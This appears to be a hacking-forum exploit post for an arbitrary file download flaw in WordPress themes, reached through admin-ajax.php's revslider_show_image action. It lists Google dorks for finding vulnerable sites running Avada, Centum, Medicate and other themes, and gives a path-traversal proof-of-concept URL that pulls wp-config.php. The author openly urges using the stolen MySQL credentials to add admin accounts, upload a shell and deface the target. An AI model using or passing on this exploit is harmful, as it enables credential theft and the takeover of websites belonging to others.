WordPress Themes admin-ajax.php - Arbitrary File Download

Hello everyone This is good exploit vulnerability. It's old vulnerability but it still work verywell
How you can get? You can get download vulnerability mysql account and then you can connect or login mysql
you can do something when you login successfully like add new account wordpress and upload shell... and deface website target.

Video Demo

# Google Dork: "Index of" +/wp-content/themes/cuckootap/
# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/

# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork: "Index of" +/wp-content/themes/ultimatum

# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork: "Index of" +/wp-content/themes/medicate/

# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork: "Index of" +/wp-content/themes/Centum/

# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork: "Index of" +/wp-content/themes/Avada/

# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork: "Index of" +/wp-content/themes/striking_r/

# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/

PoC:

http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php